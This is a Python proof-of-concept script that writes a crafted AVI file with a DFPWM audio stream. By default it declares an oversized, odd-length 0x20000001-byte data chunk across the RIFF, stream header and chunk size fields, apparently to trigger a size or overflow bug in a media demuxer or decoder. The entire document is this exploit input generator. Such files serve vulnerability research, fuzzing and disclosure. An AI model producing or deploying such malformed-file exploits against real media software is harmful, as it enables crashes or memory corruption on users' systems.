#!/usr/bin/env python3
import os
import struct
import sys


DFPWM_GUID = bytes([
    0x3A, 0xC1, 0xFA, 0x38, 0x81, 0x1D, 0x43, 0x61,
    0xA4, 0x0D, 0xCE, 0x53, 0xCA, 0x60, 0x7C, 0xD1,
])


def chunk(tag, payload):
    padding = b"\x00" if len(payload) & 1 else b""
    return tag + struct.pack("<I", len(payload)) + payload + padding


def list_chunk(kind, payload):
    data = kind + payload
    padding = b"\x00" if len(data) & 1 else b""
    return b"LIST" + struct.pack("<I", len(data)) + data + padding


def riff_file(kind, payload):
    data = kind + payload
    return b"RIFF" + struct.pack("<I", len(data)) + data


def wav_format_extensible():
    channels = 1
    sample_rate = 48_000
    bits_per_sample = 1
    block_align = 1
    byte_rate = 6_000
    cb_size = 22
    channel_mask = 4
    return struct.pack(
        "<HHIIHHH",
        0xFFFE,
        channels,
        sample_rate,
        byte_rate,
        block_align,
        bits_per_sample,
        cb_size,
    ) + struct.pack("<HI", bits_per_sample, channel_mask) + DFPWM_GUID


def make_header(payload_size):
    avih = struct.pack(
        "<IIIIIIIIIIIIII",
        1_000_000,
        payload_size,
        0,
        0x10,
        1,
        0,
        1,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
    )

    strh = struct.pack(
        "<4s4sIHHIIIIIIII",
        b"auds",
        b"\x00\x00\x00\x00",
        0,
        0,
        0,
        0,
        1,
        48_000,
        0,
        payload_size,
        0,
        0xFFFFFFFF,
        1,
    )

    stream = list_chunk(
        b"strl",
        chunk(b"strh", strh) +
        chunk(b"strf", wav_format_extensible()),
    )
    hdrl = list_chunk(b"hdrl", chunk(b"avih", avih) + stream)
    movi = b"LIST" + struct.pack("<I", 4 + 8 + payload_size + (payload_size & 1)) + b"movi"

    return b"RIFF" + struct.pack("<I", 4 + len(hdrl) + len(movi) + 8 + payload_size + (payload_size & 1)) + b"AVI " + hdrl + movi


def main():
    output = sys.argv[1] if len(sys.argv) > 1 else "poc_dfpwm.avi"
    payload_size = int(sys.argv[2], 0) if len(sys.argv) > 2 else 0x20000001

    with open(output, "wb") as f:
        f.write(make_header(payload_size))
        f.write(b"00wb")
        f.write(struct.pack("<I", payload_size))

        chunk_size = 1024 * 1024
        remaining = payload_size
        zeros = b"\x00" * chunk_size
        while remaining:
            n = min(remaining, chunk_size)
            f.write(zeros[:n])
            remaining -= n
        if payload_size & 1:
            f.write(b"\x00")

    print(f"wrote {output} ({os.path.getsize(output)} bytes)")


if __name__ == "__main__":
    main()
